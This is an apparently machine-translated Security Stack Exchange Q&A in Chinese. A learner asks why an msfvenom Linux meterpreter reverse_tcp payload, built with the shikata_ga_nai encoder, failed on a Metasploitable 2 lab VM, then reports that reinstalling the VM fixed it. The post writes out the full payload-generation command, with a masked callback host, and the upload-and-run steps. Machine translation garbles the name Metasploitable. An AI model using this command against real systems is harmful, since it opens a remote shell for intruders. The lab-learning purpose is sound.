如何使用msfvenom精灵方法处理元可倍2?
我正在读一本书,教我如何为Windows制作一个msfvenom可执行文件。但我正在学习元可绘制2。我真的不想跳过这一节而不理解这一点。所以我得到了另外两本书,但他们都只教Windows的方法,搜索网络,似乎我只找到了Windows的方式。所以我自己就开始做了。我做了下面的事。
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -e x86/shikata_ga_nai -f elf -o test.elf然后我得到了一个壳
Upload test.elf test.elf 然后我在机器上运行了bash test.elf,它什么也没做
我运行了file test.elf我得到了:
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size我做错了什么?
发布于 2021-02-19 18:58:49
经过几次重试,稍微调整有效载荷。都没有用。我重新安装了Metasploitable 2。
我再次按原计划重新制作了有效载荷。
我在元可绘制机器上运行了sudo ./test.elf,它成功了。
我以前运行过sudo ./test.elf,它给了我在另一个安装中找不到的命令。
现在看来起作用了。在制造了几个有效载荷之后,它们现在都能工作了。我想这是一个糟糕的安装,或者我搞砸了另一个Metasploitable 2。
https://security.stackexchange.com/questions/244731
复制相似问题